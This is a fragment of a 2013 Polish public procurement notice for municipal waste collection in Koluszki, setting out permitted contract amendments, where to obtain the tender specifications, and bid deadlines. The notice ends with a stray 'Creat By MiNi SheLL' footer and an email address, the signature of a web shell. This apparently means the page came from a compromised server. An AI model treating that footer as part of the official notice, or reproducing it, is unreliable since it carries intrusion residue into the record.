<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza  zmianę  postanowień  zawartej  umowy  w  stosunku do treści  oferty na podstawie,  której  dokonano  wyboru  Wykonawcy  w  następujących okolicznościach :
a) w uzasadnionych  przypadkach, lub  innych  okolicznościach  niezależnych 
od Zamawiającego lub  Wykonawcy, kiedy konieczna będzie zmiana terminu realizacji zamówienia  lub  harmonogramu  realizacji  odbioru  odpadów komunalnych,   Zamawiający w  uzgodnieniu  z  Wykonawcą  może  zmienić  harmonagram  świadczonych   usług  dostosowując  do  aktualnych  potrzeb.
b) w  innych  uzasadnionych  przypadkach,  gdy  zajdzie  konieczność wprowadzenia  koniecznych  zmian  wynikających  z  okoliczności,  których nie  można było przewidzieć  w  chwili  zawarcia  umowy,  Zamawiający za zgodą Wykonawcy może dokonać  takiej zmiany.
c) w  zakresie  zlecenia  podwykonawcom  wykonania  części  zakresu  umowy, 
lub zmiany  podwykonawcy,  których konieczność  zatrudnienia  nastąpi  z przyczyn od  Wykonawcy  niezależnych.
d) w  przypadku,  gdy zmiany  postanowień zawartej umowy będą  korzystne dla Zamawiającego, a zmiany te wynikły  w  trakcie realizacji  zamówienia, Zamawiający za zgodą Wykonawcy może dokonać  takiej  zmiany.
e) w   przypadku, gdy  zajdzie  uzasadniona  konieczność  ograniczenia  lub rezygnacji  z części  umownego  zakresu  prac, Zamawiający zapłaci  Wykonawcy tylko za wykonane  usługi.
f)  w  przypadku  ustawowej  zmiany  stawki  podatku  od  towarów  i  usług  ( VAT) cena  netto  pozostanie  bez  zmian, a  kwota podatku VAT  i  wartość  brutto zostanie  odpowiednio  skorygowana  zgodnie  z  aktualnie  obowiązującymi  przepisami  podatkowymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski  w Koluszkach przy ul. 11  Listopada 65  pokój nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 09:30, miejsce: kancelaria  Urzędu  Miejskiego w Koluszkach przy ul  11  Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com